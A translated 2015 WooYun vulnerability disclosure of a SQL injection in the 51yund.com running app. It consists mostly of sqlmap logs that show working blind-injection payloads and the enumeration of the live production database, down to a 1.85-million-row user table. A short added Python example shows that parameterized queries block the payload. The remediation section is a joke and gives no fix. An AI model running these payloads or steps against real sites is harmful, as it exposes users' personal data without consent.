
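Vulnerability summary

Bug ID: wooyun-2015-0114238

Title: SQL injection in 悦动圈 can affect site-wide data (involving 1.85 million users' information)

Vendor: 51yund.com

Author: 蛋蛋侠

Submitted: 2015-05-15 10:16

Fixed: 2015-06-29 11:00

Publicly disclosed: 2015-06-29 11:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org (for questions or help, contact [email protected])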



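Vulnerability details

Disclosure status:

2015-05-15: Details reported to the vendor; awaiting vendor handling
2015-05-15: Vendor confirmed; details disclosed only to the vendor
2015-05-25: Details disclosed to core white hats and experts in related fields
2015-06-04: Details disclosed to regular white hats
2015-06-14: Details disclosed to intern white hats
2015-06-29: Details disclosed to the public

Brief description:

@悦动圈 WooYun express delivery: your vulnerability is expected to arrive today, please watch for it! Contact me if you have any questions!

Detailed description: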


[root@Hacker~]# Sqlmap Sqlmap -u "http://circle.51yund.com/tree/donateTop?top_type=city&is_share=true&order_type=distance&province=江苏省" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey
[*] starting at 08:54:47
[08:54:47] [INFO] testing connection to the target URL
[08:54:47] [INFO] testing if the target URL is stable. This can take a couple of seconds
[08:54:48] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable paramete
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] y
[08:54:50] [INFO] testing if GET parameter 'top_type' is dynamic
[08:54:50] [INFO] heuristics detected web page charset 'ascii'
[08:54:50] [INFO] confirming that GET parameter 'top_type' is dynamic
[08:54:50] [WARNING] GET parameter 'top_type' does not appear dynamic
[08:54:50] [WARNING] heuristic (basic) test shows that GET parameter 'top_type' might not be injectable
[08:54:50] [INFO] testing for SQL injection on GET parameter 'top_type'
[08:54:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:54:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[08:54:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[08:54:53] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[08:54:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[08:54:54] [INFO] testing 'MySQL inline queries'
[08:54:54] [INFO] testing 'PostgreSQL inline queries'
[08:54:54] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[08:54:54] [INFO] testing 'Oracle inline queries'
[08:54:54] [INFO] testing 'SQLite inline queries'
[08:54:55] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[08:54:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[08:54:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[08:54:57] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[08:54:57] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[08:54:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[08:54:58] [INFO] testing 'Oracle AND time-based blind'
[08:54:59] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[08:55:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[08:55:07] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using
[08:55:15] [WARNING] GET parameter 'top_type' is not injectable
[08:55:15] [INFO] testing if GET parameter 'is_share' is dynamic
[08:55:15] [WARNING] GET parameter 'is_share' does not appear dynamic
[08:55:16] [WARNING] heuristic (basic) test shows that GET parameter 'is_share' might not be injectable
[08:55:16] [INFO] testing for SQL injection on GET parameter 'is_share'
[08:55:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:55:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[08:55:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[08:55:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[08:55:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[08:55:22] [INFO] testing 'MySQL inline queries'
[08:55:23] [INFO] testing 'PostgreSQL inline queries'
[08:55:23] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[08:55:23] [INFO] testing 'Oracle inline queries'
[08:55:23] [INFO] testing 'SQLite inline queries'
[08:55:23] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[08:55:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[08:55:25] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[08:55:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[08:55:27] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[08:55:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[08:55:29] [INFO] testing 'Oracle AND time-based blind'
[08:55:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[08:55:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[08:55:50] [INFO] target URL appears to be UNION injectable with 10 columns
[08:55:50] [WARNING] applying generic concatenation with double pipes ('||')
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[08:57:33] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. --dbms=mysql)
[08:57:35] [WARNING] GET parameter 'is_share' is not injectable
[08:57:35] [INFO] testing if GET parameter 'order_type' is dynamic
[08:57:35] [INFO] confirming that GET parameter 'order_type' is dynamic
[08:57:35] [WARNING] GET parameter 'order_type' does not appear dynamic
[08:57:36] [WARNING] heuristic (basic) test shows that GET parameter 'order_type' might not be injectable
[08:57:36] [INFO] testing for SQL injection on GET parameter 'order_type'
[08:57:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:57:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[08:57:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[08:57:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[08:57:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[08:57:39] [INFO] testing 'MySQL inline queries'
[08:57:40] [INFO] testing 'PostgreSQL inline queries'
[08:57:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[08:57:40] [INFO] testing 'Oracle inline queries'
[08:57:40] [INFO] testing 'SQLite inline queries'
[08:57:40] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[08:57:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[08:57:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[08:57:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[08:57:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[08:57:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[08:57:44] [INFO] testing 'Oracle AND time-based blind'
[08:57:45] [INFO] testing 'MySQL UNION query (72) - 1 to 10 columns'
[08:57:52] [INFO] testing 'Generic UNION query (72) - 1 to 10 columns'
[08:58:31] [WARNING] GET parameter 'order_type' is not injectable
[08:58:31] [INFO] testing if GET parameter 'province' is dynamic
[08:58:32] [INFO] confirming that GET parameter 'province' is dynamic
[08:58:32] [INFO] GET parameter 'province' is dynamic
[08:58:32] [WARNING] heuristic (basic) test shows that GET parameter 'province' might not be injectable
[08:58:32] [INFO] testing for SQL injection on GET parameter 'province'
[08:58:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:58:32] [WARNING] reflective value(s) found and filtering out
[08:58:34] [INFO] GET parameter 'province' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[08:58:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[08:58:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[08:58:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[08:58:36] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[08:58:36] [INFO] testing 'MySQL inline queries'
[08:58:36] [INFO] testing 'PostgreSQL inline queries'
[08:58:36] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[08:58:36] [INFO] testing 'Oracle inline queries'
[08:58:36] [INFO] testing 'SQLite inline queries'
[08:58:36] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[08:58:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[08:58:36] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[08:58:36] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[08:59:36] [INFO] GET parameter 'province' is 'MySQL > 5.0.11 AND time-based blind' injectable
[08:59:36] [INFO] testing 'MySQL UNION query (72) - 1 to 20 columns'
[08:59:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique
[08:59:59] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:59:59] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wa
[09:00:09] [INFO] testing 'Generic UNION query (72) - 1 to 20 columns'
GET parameter 'province' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[09:00:44] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandl
sqlmap identified the following injection points with a total of 662 HTTP(s) requests:
---
Place: GET
Parameter: province
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: top_type=city&is_share=true&order_type=distance&province=???' AND 6787=6787 AND 'oXfA'='oXfA
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: top_type=city&is_share=true&order_type=distance&province=???' AND SLEEP(5) AND 'vasu'='vasu
---
[09:00:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[09:00:44] [INFO] fetching database names
[09:00:44] [INFO] fetching number of databases
[09:00:44] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:00:44] [INFO] retrieved: 3
[09:00:45] [INFO] retrieved: information_schema
[09:01:11] [INFO] retrieved: sport
[09:01:19] [INFO] retrieved: test
available databases [3]:
[*] information_schema
[*] sport
[*] test
[09:01:32] [WARNING] HTTP error codes detected during run:
502 (Bad Gateway) - 424 times
[09:01:32] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\circle.51yund.com'
[*] shutting down at 09:01:32
[root@Hacker~]# Sqlmap Sqlmap -u "http://circle.51yund.com/tree/donateTop?top_type=city&is_share=true&order_type=distance&province=江苏省" -D sp
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey
[*] starting at 09:03:54
[09:03:54] [INFO] resuming back-end DBMS 'mysql'
[09:03:54] [INFO] testing connection to the target URL
[09:03:54] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandl
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: province
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: top_type=city&is_share=true&order_type=distance&province=???' AND 6787=6787 AND 'oXfA'='oXfA
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: top_type=city&is_share=true&order_type=distance&province=???' AND SLEEP(5) AND 'vasu'='vasu
---
[09:03:54] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[09:03:54] [INFO] fetching tables for database: 'sport'
[09:03:54] [INFO] fetching number of tables for database 'sport'
[09:36:57] [INFO] retrieved: 16
[09:37:08] [INFO] retrieved: tree_donate_tree
[09:37:08] [INFO] retrieving the length of query output
[09:37:08] [INFO] retrieved: 16
[09:37:20] [INFO] retrieved: tree_report_user
[09:37:20] [INFO] retrieving the length of query output
[09:37:20] [INFO] retrieved: 13
[09:37:30] [INFO] retrieved: tree_run_info
[09:37:30] [INFO] retrieving the length of query output
[09:37:30] [INFO] retrieved: 9
[09:37:36] [INFO] retrieved: uban_info
[09:37:36] [INFO] retrieving the length of query output
[09:37:36] [INFO] retrieved: 13
[09:37:46] [INFO] retrieved: uban_reg_info
[09:37:46] [INFO] retrieving the length of query output
[09:37:46] [INFO] retrieved: 16
[09:37:58] [INFO] retrieved: upload_tickets64
[09:37:58] [INFO] retrieving the length of query output
[09:37:58] [INFO] retrieved: 13
[09:38:08] [INFO] retrieved: user_activity
[09:38:08] [INFO] retrieving the length of query output
[09:38:08] [INFO] retrieved: 8
[09:38:15] [INFO] retrieved: user_aim
[09:38:15] [INFO] retrieving the length of query output
[09:38:15] [INFO] retrieved: 15
[09:38:26] [INFO] retrieved: user_aim_notify
[09:38:26] [INFO] retrieving the length of query output
[09:38:26] [INFO] retrieved: 9
[09:38:32] [INFO] retrieved: user_bind
[09:38:32] [INFO] retrieving the length of query output
[09:38:32] [INFO] retrieved: 11
[09:38:46] [INFO] retrieved: user__ircle 10/11 (91%)
[09:38:56] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:38:58] [INFO] retrieved: user_circle
[09:38:58] [INFO] retrieving the length of query output
[09:38:58] [INFO] retrieved: 20
[09:39:12] [INFO] retrieved: user_circle_activity
[09:39:12] [INFO] retrieving the length of query output
[09:39:12] [INFO] retrieved: 12
[09:39:22] [INFO] retrieved: user_contact
[09:39:22] [INFO] retrieving the length of query output
[09:39:22] [INFO] retrieved: 9
[09:39:29] [INFO] retrieved: user_evil
[09:39:29] [INFO] retrieving the length of query output
[09:39:29] [INFO] retrieved: 11
[09:39:38] [INFO] retrieved: user_follow
[09:39:38] [INFO] retrieving the length of query output
[09:39:38] [INFO] retrieved: 11
[09:39:48] [INFO] retrieved: user_friend
[09:39:48] [INFO] retrieving the length of query output
[09:39:48] [INFO] retrieved: 14
[09:39:59] [INFO] retrieved: user_group_run
[09:39:59] [INFO] retrieving the length of query output
[09:39:59] [INFO] retrieved: 19
[09:40:12] [INFO] retrieved: user_group_run_0128
[09:40:12] [INFO] retrieving the length of query output
[09:40:12] [INFO] retrieved: 22
[09:40:28] [INFO] retrieved: user_group_run_del_lkb
[09:40:28] [INFO] retrieving the length of query output
[09:40:28] [INFO] retrieved: 9
[09:40:35] [INFO] retrieved: user_info
[09:40:35] [INFO] retrieving the length of query output
[09:40:35] [INFO] retrieved: 13
[09:40:48] [INFO] retrieved: user_info_tmp
[09:40:48] [INFO] retrieving the length of query output
[09:40:48] [INFO] retrieved: 16
[09:40:59] [INFO] retrieved: user_invite_evil
[09:40:59] [INFO] retrieving the length of query output
[09:40:59] [INFO] retrieved: 11
[09:41:08] [INFO] retrieved: user_launch
[09:41:08] [INFO] retrieving the length of query output
[09:41:08] [INFO] retrieved: 13
[09:41:18] [INFO] retrieved: user_location
[09:41:18] [INFO] retrieving the length of query output
[09:41:18] [INFO] retrieved: 10
[09:41:25] [INFO] retrieved: user_login
[09:41:25] [INFO] retrieving the length of query output
[09:41:25] [INFO] retrieved: 14
[09:41:43] [INFO] retrieved: user_marketing
[09:41:43] [INFO] retrieving the length of query output
[09:41:43] [INFO] retrieved: 16
[09:42:06] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:42:16] [INFO] retrieved: user_online_info
[09:42:16] [INFO] retrieving the length of query output
[09:42:16] [INFO] retrieved: 21
[09:42:31] [INFO] retrieved: user_online_info_area
[09:42:31] [INFO] retrieving the length of query output
[09:42:31] [INFO] retrieved: 13
[09:42:54] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:43:04] [INFO] retrieved: user_pay_info
[09:43:04] [INFO] retrieving the length of query output
[09:43:04] [INFO] retrieved: 18
[09:43:16] [INFO] retrieved: user_pay_info_cash
[09:43:17] [INFO] retrieving the length of query output
[09:43:17] [INFO] retrieved: 18
[09:43:29] [INFO] retrieved: user_pay_info_mall
[09:43:29] [INFO] retrieving the length of query output
[09:43:29] [INFO] retrieved: 10
[09:43:37] [INFO] retrieved: user_photo
[09:43:37] [INFO] retrieving the length of query output
[09:43:37] [INFO] retrieved: 13
[09:43:48] [INFO] retrieved: user_portrait
[09:43:48] [INFO] retrieving the length of query output
[09:43:48] [INFO] retrieved: 18
[09:44:00] [INFO] retrieved: user_property_info
[09:44:00] [INFO] retrieving the length of query output
[09:44:00] [INFO] retrieved: 25
[09:44:19] [INFO] retrieved: user_reward_custom_record
[09:44:19] [INFO] retrieving the length of query output
[09:44:19] [INFO] retrieved: 30
[09:44:37] [INFO] retrieved: user_reward_custom_record_test
[09:44:37] [INFO] retrieving the length of query output
[09:44:37] [INFO] retrieved: 21
[09:44:51] [INFO] retrieved: user_run_rank_history
[09:44:51] [INFO] retrieving the length of query output
[09:44:51] [INFO] retrieved: 11
[09:45:00] [INFO] retrieved: user_runner
[09:45:00] [INFO] retrieving the length of query output
[09:45:00] [INFO] retrieved: 20
[09:45:14] [INFO] retrieved: user_runner_bracelet
[09:45:14] [INFO] retrieving the length of query output
[09:45:14] [INFO] retrieved: 16
[09:45:25] [INFO] retrieved: user_runner_step
[09:45:25] [INFO] retrieving the length of query output
[09:45:25] [INFO] retrieved: 12
[09:45:36] [INFO] retrieved: user_running
[09:45:36] [INFO] retrieving the length of query output
[09:45:36] [INFO] retrieved: 12
[09:45:46] [INFO] retrieved: user_setting
[09:45:46] [INFO] retrieving the length of query output
[09:45:46] [INFO] retrieved: 14
[09:45:56] [INFO] retrieved: user_tickets64
[09:45:56] [INFO] retrieving the length of query output
[09:45:56] [INFO] retrieved: 14
[09:46:07] [INFO] retrieved: user_week_data
[09:46:07] [INFO] retrieving the length of query output
[09:46:07] [INFO] retrieved: 12
[09:46:17] [INFO] retrieved: user_welcome
[09:46:17] [INFO] retrieving the length of query output
[09:46:17] [INFO] retrieved: 7
[09:46:22] [INFO] retrieved: wangcai
[09:46:22] [INFO] retrieving the length of query output
[09:46:22] [INFO] retrieved: 19
[09:46:35] [INFO] retrieved: wangcai_yingyongbao
[09:46:35] [INFO] retrieving the length of query output
[09:46:35] [INFO] retrieved: 11
[09:46:43] [INFO] retrieved: week_remain
[09:46:43] [INFO] retrieving the length of query output
[09:46:43] [INFO] retrieved: 16
[09:46:55] [INFO] retrieved: yuepao_user_info
Database: sport
[197 tables]
+---------------------------------+
| activity_ads_for_web_new |
| activity_feed_info |
| activity_info |
| activity_intro_photo_info |
| activity_kind_info |
| activity_member |
| activity_photo |
| activity_praise_info |
| activity_property_info |
| activity_score |
| activity_tickets64 |
| address |
| admanager__ads |
| admanager__campaigns |
| admanager__interactions |
| army_passwd |
| army_report_user |
| army_report_user_50 |
| army_report_user_tmp |
| army_run_info |
| bean_qq_upload |
| bean_qq_upload_stat |
| bracelet_msg_table |
| bracelet_msg_template_table |
| bracelet_runner_info |
| bracelet_user_area_stat |
| bracelet_user_plat_stat |
| bracelet_user_run_stat |
| bracelet_user_sex_keyrange_stat |
| bracelet_version |
| cat1 |
| cat2 |
| cat3 |
| circle_activity_info |
| circle_extra_info |
| circle_group_runner_top |
| circle_info |
| circle_stat |
| circle_tickets64 |
| city |
| city_address |
| city_area |
| custom_service_question |
| day_remain |
| day_stat |
| device_info |
| discuss_photo_info |
| discuss_tickets64 |
| discussion_info |
| draw_cash_record |
| draw_reward_record |
| dynamic_feed_discuss |
| dynamic_feed_id |
| dynamic_feed_info |
| dynamic_feed_like |
| enum_index |
| error_stat |
| feed_info |
| feed_photo_info |
| feed_praise_info |
| feed_tickets64 |
| feed_type |
| get_notify |
| get_notify_user_ts |
| group_run_info |
| group_run_stat |
| history_user_day_step |
| history_user_runner_new |
| hundred_batchall_flag |
| hundred_circle_group_run |
| hundred_circle_group_run_extra |
| hundred_circle_group_run_score |
| hundred_group_run_info |
| hundred_host_group_run |
| hundred_user_group_run |
| hx_user_info |
| invite_openid |
| invite_user_info |
| invited_user_info |
| ip_area |
| jiaolian |
| log_query |
| log_report_user |
| mall_buyer |
| mall_circle_product |
| mall_order |
| mall_product |
| mall_product_commit |
| mallorder_tickets64 |
| marathon_run_info |
| marathon_runner_info |
| marathon_team_info |
| marathon_top |
| marathon_user_run_info |
| marathon_user_run_info_bk |
| media__gallery |
| media__gallery_media |
| media__media |
| message_delete |
| message_info |
| message_info_uniq |
| message_tickets64 |
| message_unread |
| month_remain |
| nday_challenge_run_info |
| nday_challenge_user_info |
| nkm_challenge_report_user |
| nkm_challenge_run_info |
| nkm_challenge_user_info |
| nkm_challenge_user_info_city |
| openid_info |
| page |
| phone_code_tickets64 |
| photo_info |
| photo_tickets64 |
| province_city |
| pusher_info |
| pusher_record |
| request_detail |
| run_game |
| runner_info |
| runner_info_del_lkb |
| runner_mc_info |
| runner_tickets64 |
| runner_top |
| runner_top_history |
| runner_top_like |
| runner_top_like_step |
| runner_top_step |
| share_reward_info |
| share_reward_stat |
| share_user_reward_info |
| system_notify_info |
| system_notify_record |
| test_detail |
| test_suite |
| test_user |
| theme_info |
| to_send_notify |
| to_send_sms |
| topic_discussion_info |
| topic_info |
| topic_like |
| topic_photo_info |
| topic_tickets64 |
| tree_donate_num |
| tree_donate_reward |
| tree_donate_stat |
| tree_donate_tree |
| tree_report_user |
| tree_run_info |
| uban_info |
| uban_reg_info |
| upload_tickets64 |
| user_activity |
| user_aim |
| user_aim_notify |
| user_bind |
| user_circle |
| user_circle_activity |
| user_contact |
| user_evil |
| user_follow |
| user_friend |
| user_group_run |
| user_group_run_0128 |
| user_group_run_del_lkb |
| user_info |
| user_info_tmp |
| user_invite_evil |
| user_launch |
| user_location |
| user_login |
| user_marketing |
| user_online_info |
| user_online_info_area |
| user_pay_info |
| user_pay_info_cash |
| user_pay_info_mall |
| user_photo |
| user_portrait |
| user_property_info |
| user_reward_custom_record |
| user_reward_custom_record_test |
| user_run_rank_history |
| user_runner |
| user_runner_bracelet |
| user_runner_step |
| user_running |
| user_setting |
| user_tickets64 |
| user_week_data |
| user_welcome |
| wangcai |
| wangcai_yingyongbao |
| week_remain |
| yuepao_user_info |
+---------------------------------+
[09:46:55] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\circle.51yund.com'
[*] shutting down at 09:46:55
[root@Hacker~]# Sqlmap Sqlmap -u "http://circle.51yund.com/tree/donateTop?top_type=city&is_share=true&order_type=distance&province=江苏省" -D sp
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey
[*] starting at 09:51:08
[09:51:08] [INFO] resuming back-end DBMS 'mysql'
[09:51:08] [INFO] testing connection to the target URL
[09:51:08] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandl
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: province
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: top_type=city&is_share=true&order_type=distance&province=???' AND 6787=6787 AND 'oXfA'='oXfA
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: top_type=city&is_share=true&order_type=distance&province=???' AND SLEEP(5) AND 'vasu'='vasu
---
[09:51:08] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[09:51:08] [INFO] retrieved:
[09:51:38] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[09:51:38] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
[09:51:42] [WARNING] reflective value(s) found and filtering out
1852068
Database: sport
+------------------+---------+
| Table | Entries |
+------------------+---------+
| yuepao_user_info | 1852068 |
+------------------+---------+
[09:52:47] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\circle.51yund.com'

Proof of vulnerability:

[Screenshots: QQ截图20150515100340.png, QQ截图20150515100454.png, QQ截图20150515100553.png]


Remediation:

Want to go for a run together (yue pao)?

Copyright notice: when reposting, please credit the source 蛋蛋侠@乌云
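
An added example, not part of the original report and not the vendor's code: the boolean-based blind payload shape that sqlmap reported for `province`, run against a concatenated query and against a parameterized one. The table `donate_top`, its columns, the sample rows, the `6787=6788` false probe and the SQLite back end are assumptions made so the example runs offline (the reported back end is MySQL).

```python
import sqlite3

# Constructed stand-in for the data behind /tree/donateTop (hypothetical schema).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE donate_top (province TEXT, city TEXT, distance REAL)")
    db.executemany(
        "INSERT INTO donate_top VALUES (?, ?, ?)",
        [("江苏省", "南京", 120.5), ("江苏省", "苏州", 98.0), ("浙江省", "杭州", 77.2)],
    )
    return db

def top_vulnerable(db, province):
    # Request value concatenated into the statement: a quote in it ends the literal
    # and everything after the quote is parsed as SQL.
    sql = ("SELECT city FROM donate_top WHERE province = '" + province
           + "' ORDER BY distance DESC")
    return [row[0] for row in db.execute(sql)]

def top_parameterized(db, province):
    # Placeholder binding: the value reaches the engine as data, never as SQL text.
    sql = "SELECT city FROM donate_top WHERE province = ? ORDER BY distance DESC"
    return [row[0] for row in db.execute(sql, (province,))]

# Payload shape from the sqlmap output, and a constructed always-false twin.
TRUE_PROBE = "江苏省' AND 6787=6787 AND 'oXfA'='oXfA"
FALSE_PROBE = "江苏省' AND 6787=6788 AND 'oXfA'='oXfA"

def leaks_boolean_oracle(query_fn):
    """True when the true and false probes yield different responses,
    which is the signal boolean-based blind extraction depends on."""
    db = make_db()
    return query_fn(db, TRUE_PROBE) != query_fn(db, FALSE_PROBE)

if __name__ == "__main__":
    print("concatenated leaks oracle: ", leaks_boolean_oracle(top_vulnerable))
    print("parameterized leaks oracle:", leaks_boolean_oracle(top_parameterized))
```

With bound parameters both probes are compared as literal province names and match nothing, so the response no longer depends on the injected condition.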


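Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-05-15 10:58

Vendor reply:

Thanks for the report, much appreciated.

Latest status:

None yet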

